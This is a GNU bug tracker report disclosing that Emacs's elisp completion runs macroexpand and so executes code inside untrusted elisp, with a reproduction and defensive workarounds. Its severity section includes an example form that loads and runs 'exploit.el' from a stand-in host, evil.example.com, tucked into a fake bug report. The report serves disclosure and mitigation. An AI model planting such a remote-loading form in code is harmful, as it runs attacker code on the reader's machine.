GNU bug report logs - #32495
26.1; Arbitrary code execution when completing inside untrusted elisp code

Previous Next

Package: emacs;

Reported by: Wilfred Hughes <me <at> wilfred.me.uk>

Date: Wed, 22 Aug 2018 00:13:02 UTC

Severity: normal

Tags: security

Found in version 26.1

Full log

View this message in rfc822 format

From: Wilfred Hughes <me <at> wilfred.me.uk>
To: 32495 <at> debbugs.gnu.org
Subject: bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code
Date: Wed, 22 Aug 2018 01:11:55 +0100

elisp-completion-at-point calls macroexpand, which may execute arbitrary code.

REPRODUCING

1. Insert this code in a buffer in emacs-lisp-mode.

(let ((foo (eval-when-compile (debug))))
  x)

2. Put point on x.

3. Press C-M-i, or M-x elisp-completion-at-point.

4. Observe that the debugger is opened, because code is being executed!

SEVERITY

I don't know whether Emacs considers calling code-completion on
untrusted code to be a concern or not. A contrived example might look
like a bug report containing the following:

(let ((foo (eval-when-compile (eval "/ftp:evil.example.com:exploit.el")))
      ;; ... lots of code
      (bar 1))
  ;; Dear maintainer, I've found a bug in your completion. Please try
  ;; completion in the following:
  abc
  )

This could also cause accidental issues, as I might edit code that has
some unwanted side-effects inside eval-when-compile blocks. However,
this functionality has existed since 2013 (added in commit
bbcc4d97447a by Stefan) and no-one has noticed so far.

WORKAROUNDS

When calling macroexpand or macroexpand-all, either:

1. pass in an environment with all untrusted macros replaced with dummies:


(let ((macro-whitelist '(when pcase))
      all-macros
      safe-env)
  (mapatoms
   (lambda (sym)
     (when (macrop sym)
       (push sym all-macros))))
  (mapc
   (lambda (sym)
     (unless (memq sym macro-whitelist)
       (push (cons sym (symbol-function 'ignore))
             safe-env)))
   all-macros)

  (macroexpand-all
   arbitrary-form-here
   safe-env))

2. bind all eval-capable functions first (INCOMPLETE, there are other
eval-capable functions, such as load):

(cl-letf (((symbol-function 'eval) #'ignore)
          ((symbol-function 'eval-region) #'ignore)
          ((symbol-function 'eval-buffer) #'ignore)
          ((symbol-function 'backtrace-eval) #'ignore))
  (macroexpand-all some-arbitrary-form-here))
This bug report was last modified 6 years and 358 days ago.

Previous Next

GNU bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.